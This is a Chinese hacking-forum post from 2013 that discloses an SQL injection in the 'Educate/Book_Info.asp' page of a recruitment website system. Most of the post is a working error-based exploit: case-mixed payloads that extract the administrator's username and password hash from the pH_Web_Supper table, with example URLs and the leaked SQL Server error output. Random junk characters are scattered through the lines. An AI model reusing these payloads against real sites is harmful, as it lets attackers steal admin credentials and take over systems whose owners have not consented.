找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2323|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
7 S* ]0 G- v- I2 f- K4 v 4 X& _7 X1 t% r5 C5 b0 }/ {9 s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
* h! p5 X- y" d- S/ g/ I: j . S+ m  u8 w/ F$ E* v, V
exp:如下
, Z2 Y7 N, Z+ L) i查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
/ @. N; x; u* [* Y查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
; f7 `/ a# H  ? 6 u* m0 w4 }! D3 {! [4 }/ z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ V$ c0 n2 _4 \+ p, |

8 b; B7 y4 X1 [. pMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'( k3 i% F. d/ n/ s5 \& n( @
7 |8 a: t9 s. L0 m/ Y- ~$ Z
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 X7 r. l2 u! {0 L% }2 ?' _$ T * \  x2 z2 R8 \
/Educate/Book_Info.asp,行 8
  z5 c# v- E# r* _1 ~; V
. h. M2 S8 K( [http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" P+ A4 D/ ~+ T  P
7 a7 O( \( N3 X8 {
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
& o6 h! v- X* @/ y% A
( K6 ]; r( p1 i将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。; ?. j" k% h: B' j4 D- E- ]

( \/ D) @+ k/ _/ G) @$ H$ c/Educate/Book_Info.asp,行 8
& d' e) f0 ]$ s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表